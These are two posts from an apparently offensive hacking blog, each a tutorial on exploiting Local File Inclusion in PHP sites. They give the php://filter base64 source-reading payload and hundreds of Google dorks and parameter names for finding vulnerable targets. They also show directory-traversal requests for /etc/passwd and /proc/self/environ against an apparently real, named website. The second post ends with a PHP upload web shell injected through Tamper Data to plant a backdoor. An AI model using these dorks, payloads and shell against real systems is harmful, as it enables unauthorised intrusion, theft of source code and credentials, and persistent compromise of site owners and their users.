Recent Post

Flag Counter
Showing posts with label Local File Inclusion. Show all posts
Showing posts with label Local File Inclusion. Show all posts

Tuesday, November 13, 2012

[Tut] LFI php://filter/read Source Code

Tuesday, November 13, 2012  Unknown  No comments

Read Source Code From LFI


Yeah..many Techniques that We can exploit from LFI Vulnerabilty.Ok before Next read..You could read my posting about Technique upload Shell Via Tamper data LFI Exploitation /proc/self/environ
No I tell you exploitation in LFI vulnerabilty using php://filter/read=convert.base64-encode/resource=

This exploit goals to read the source of file in that Vulnerable Website but The Source encoded With base64 code
http://target.com/index.php?page=php://filter/read=convert.base64-encode/resource=file.php


That is an example of the exploitation..U must decode that Source base64 code :D

OK..If You wanna To Watch My POC in video i have made..You are able to Download that
Thank you for watching ^^

http://www.ziddu.com/download/16299804/LFiAnOtherWAy.rar.html

OR untuk mirror
http://www.mediafire.com/?mz3y77fgkok2doql

Search Terms :

  • local file inclusion
  • remote file inclusion
  • local file inclusion tutorial
  • local file inclusion vulnerability
  • lfi local file inclusion
  • local file inclusion exploit
  • local file include
  • web server vulnerability
  • vulnerability php
  • vulnerability of web server
  • web server attacks



Read More

Monday, April 18, 2011

[Tut] Local File Inculusion / LFI (/proc/self/environ)

Monday, April 18, 2011  Unknown  No comments

LFI (Local File Inclusion) /proc/self/environ Tamper data
LFI (Local File Inclusion)

What is LFI or Local File Inclusion?
This Description from Wikipedia
is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected
Example of Php Vulnerable script

<?php $file = $_GET['file'];
if(isset($file))
{
include("pages/$file");
}
else
{
include("index.php");
}

So this script PHP could be injected like
http://example.com/index.php?file=contactus.php


OK Now i will show you POC exploited This vulnerablity The Way backdoored shell via Tamper data

1.First.you could search in google Vulnerable website.HEre Are The list of Dorks ive collected..
Dorks :

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

 inurl:/include/new-visitor.inc.php?lvc_include_dir=

 inurl:/_functions.php?prefix=

 inurl:/cpcommerce/_functions.php?prefix=

 inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

 inurl:/modules/agendax/addevent.inc.php?agendax_path=

 inurl:/ashnews.php?pathtoashnews=

 inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

 inurl:/pm/lib.inc.php?pm_path=

 inurl:/b2-tools/gm-2-b2.php?b2inc=

 inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

 inurl:/modules/agendax/addevent.inc.php?agendax_path=

 inurl:/includes/include_once.php?include_file=

 inurl:/e107/e107_handlers/secure_img_render.php?p=

 inurl:/shoutbox/expanded.php?conf=

 inurl:/main.php?x=

 inurl:/myPHPCalendar/admin.php?cal_dir=

 inurl:/index.php/main.php?x=

 inurl:/index.php?include=

 inurl:/index.php?x=

 inurl:/index.php?open=

 inurl:/index.php?visualizar=

 inurl:/template.php?pagina=

 inurl:/index.php?pagina=

 inurl:/index.php?inc=

 inurl:/includes/include_onde.php?include_file=

 inurl:/index.php?page=

 inurl:/index.php?pg=

 inurl:/index.php?show=

 inurl:/index.php?cat=

 inurl:/index.php?file=

 inurl:/db.php?path_local=

 inurl:/index.php?site=

 inurl:/htmltonuke.php?filnavn=

 inurl:/livehelp/inc/pipe.php?HCL_path=

 inurl:/hcl/inc/pipe.php?HCL_path=

 inurl:/inc/pipe.php?HCL_path=

 inurl:/support/faq/inc/pipe.php?HCL_path=

 inurl:/help/faq/inc/pipe.php?HCL_path=

 inurl:/helpcenter/inc/pipe.php?HCL_path=

 inurl:/live-support/inc/pipe.php?HCL_path=

 inurl:/gnu3/index.php?doc=

 inurl:/gnu/index.php?doc=

 inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

 inurl:/forum/install.php?phpbb_root_dir=

 inurl:/includes/calendar.php?phpc_root_path=

 inurl:/includes/setup.php?phpc_root_path=

 inurl:/inc/authform.inc.php?path_pre=

 inurl:/include/authform.inc.php?path_pre=

 inurl:index.php?nic=

 inurl:index.php?sec=

 inurl:index.php?content=

 inurl:index.php?link=

 inurl:index.php?filename=

 inurl:index.php?dir=

 inurl:index.php?document=

 inurl:index.php?view=

 inurl:*.php?sel=

 inurl:*.php?session=&content=

 inurl:*.php?locate=

 inurl:*.php?place=

 inurl:*.php?layout=

 inurl:*.php?go=

 inurl:*.php?catch=

 inurl:*.php?mode=

 inurl:*.php?name=

 inurl:*.php?loc=

 inurl:*.php?f=

 inurl:*.php?inf=

 inurl:*.php?pg=

 inurl:*.php?load=

 inurl:*.php?naam=

 allinurl:/index.php?page= site:*.dk

 allinurl:/index.php?file= site:*.dk

 INURL OR ALLINURL WITH:

 /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

 /includes/header.php?systempath=

 /Gallery/displayCategory.php?basepath=

 /index.inc.php?PATH_Includes=

 /ashnews.php?pathtoashnews=

 /ashheadlines.php?pathtoashnews=

 /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

 /demo/includes/init.php?user_inc=

 /jaf/index.php?show=

 /inc/shows.inc.php?cutepath=

 /poll/admin/common.inc.php?base_path=

 /pollvote/pollvote.php?pollname=

 /sources/post.php?fil_config=

 /modules/My_eGallery/public/displayCategory.php?basepath=

 /bb_lib/checkdb.inc.php?libpach=

 /include/livre_include.php?no_connect=lol&chem_absolu=

 /index.php?from_market=Y&pageurl=

 /modules/mod_mainmenu.php?mosConfig_absolute_path=

 /pivot/modules/module_db.php?pivot_path=

 /modules/4nAlbum/public/displayCategory.php?basepath=

 /derniers_commentaires.php?rep=

 /modules/coppermine/themes/default/theme.php?THEME_DIR=

 /modules/coppermine/include/init.inc.php?CPG_M_DIR=

 /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

 /coppermine/themes/maze/theme.php?THEME_DIR=

 /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

 /allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

 /myPHPCalendar/admin.php?cal_dir=

 /agendax/addevent.inc.php?agendax_path=

 /modules/mod_mainmenu.php?mosConfig_absolute_path=

 /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

 /main.php?page=

 /default.php?page=

 /index.php?action=

 /index1.php?p=

 /index2.php?x=

 /index2.php?content=

 /index.php?conteudo=

 /index.php?cat=

 /include/new-visitor.inc.php?lvc_include_dir=

 /modules/agendax/addevent.inc.php?agendax_path=

 /shoutbox/expanded.php?conf=

 /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

 /pivot/modules/module_db.php?pivot_path=

 /library/editor/editor.php?root=

 /library/lib.php?root=

 /e107/e107_handlers/secure_img_render.php?p=

 /zentrack/index.php?configFile=

 /main.php?x=

 /becommunity/community/index.php?pageurl=

 /GradeMap/index.php?page=

 /index4.php?body=

 /side/index.php?side=

 /main.php?page=

 /es/index.php?action=

 /index.php?sec=

 /index.php?main=

 /index.php?sec=

 /index.php?menu=

 /html/page.php?page=

 /page.php?view=

 /index.php?menu=

 /main.php?view=

 /index.php?page=

 /content.php?page=

 /main.php?page=

 /index.php?x=

 /main_site.php?page=

 /index.php?L2=

 /content.php?page=

 /main.php?page=

 /index.php?x=

 /main_site.php?page=

 /index.php?L2=

 /index.php?show=

 /tutorials/print.php?page=

 /index.php?page=

 /index.php?level=

 /index.php?file=

 /index.php?inter_url=

 /index.php?page=

 /index2.php?menu=

 /index.php?level=

 /index1.php?main=

 /index1.php?nav=

 /index1.php?link=

 /index2.php?page=

 /index.php?myContent=

 /index.php?TWC=

 /index.php?sec=

 /index1.php?main=

 /index2.php?page=

 /index.php?babInstallPath=

 /main.php?body=

 /index.php?z=

 /main.php?view=

 /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

 /index.php?file=

 /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

 1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=

 2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

 3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=

 4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=

 5. allinurlP:NphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

 6. allinurl:ihm.php?p=

 7. Keyword : "powered by AllMyLinks"
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

 8. allinurl:/modules.php?name=allmyguests
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

 9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=

 10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=

 11. keyword : "Powered by phpBB 2.0.6"
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=

 12. keyword : "powered by CubeCart 3.0.6"
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

 13. keyword : "powered by paBugs 2.0 Beta 3"
/class.mysql.php?path_to_bt_dir=

 14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews=

 15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

 16. allinurl:ihm.php?p=*

 14. keyword : "powered eyeOs"
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cm d=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5b a%5d);&a=

 15. allinurl:.php?bodyfile=

 16. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

 17. allinurl:forums.html
/modules.php?name=

 18. allinurl:/default.php?page=home

 19. allinurl:/folder.php?id=

 20. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=

 21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

 22. allinurl:application.php?base_path=
/application.php?base_path=

 23. allinurlp:hplivehelper
/phplivehelper/initiate.php?abs_path=

 24. allinurlp:hpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

 25. key word : "powered by Fantastic News v2.1.2"
/archive.php?CONFIG[script_path]=

 26. keyword: "powered by smartblog" AND inurl:?page=login
/index.php?page=

 27. allinurl:/forum/
/forum/admin/index.php?inc_conf=

 28. keyword:"Powered By FusionPHP"
/templates/headline_temp.php?nst_inc=

 29. allinurl:shoutbox/expanded.php filetypep:hp
/shoutbox/expanded.php?conf=

 30. allinurl: /osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=

 31. keyword : "Powered by iUser"
/common.php?include_path=

 32. allinurl: "static.php?load="
/static.php?load=

 33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

 34. keyworld: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=

 35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=
LFI(Local File Inclusion)

 acion=
act=
action=
API_HOME_DIR=
board=
cat=
client_id=
cmd=
cont=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=
getdata=
go=
HT=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
skin=
static=
str=
strona=
sub=
tresc=
url=
user=


2.OK after Get the Website,Check That Website
For example;
http://vanessasbodymall.com/index.php?page=products.php

Is that website could call /etc/passwd File ????
You could add an ../../ << To go to that Server Website Directory
http://vanessasbodymall.com/index.php?page=/etc/passwd

3.So if '/etc/passwd' could be Called So that Site Vulnerable With LFI.So How To plant WebShell/Backdoor? > You should check Wheather /proc/self/environ < Could be Called ,So The URI likes below
http://vanessasbodymall.com/index.php?page=../../../../../../../../proc/self/environ

4.Upload Sheel via tamper data
You Should download That firefox plugin..Here i Give U the link
https://addons.mozilla.org/en-us/firefox/downloads/file/79565/tamper_data-11.0.1-fx.xpi?src=addondetail&confirmed=1

Ok Next Step after installing the plugin

a.Restart Your browser Mozilla Firefox
b.Then Click "Tool" > "MenuBar" and klik "Tamper Data"
c.Click start tamper > lalu refresh page tersebut
d.So will be pop up > Click "Tamper"
e.Replace This Code or You could Replace anything php evil code
<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Done The Work!!!</b><br><br>'; }
else { echo '<b>Upload Failed! </b><br><br>'; }
}
?>

f.Yes Right..If You're Success plant That Php Script..This Script will be located at http://vanessasbodymall.com/Yourshellname.php

Search Terms :

  • local file inclusion
  • remote file inclusion
  • local file inclusion tutorial
  • local file inclusion vulnerability
  • lfi local file inclusion
  • local file inclusion exploit
  • local file include
  • web server vulnerability
  • vulnerability php
  • vulnerability of web server
  • web server attacks

Read More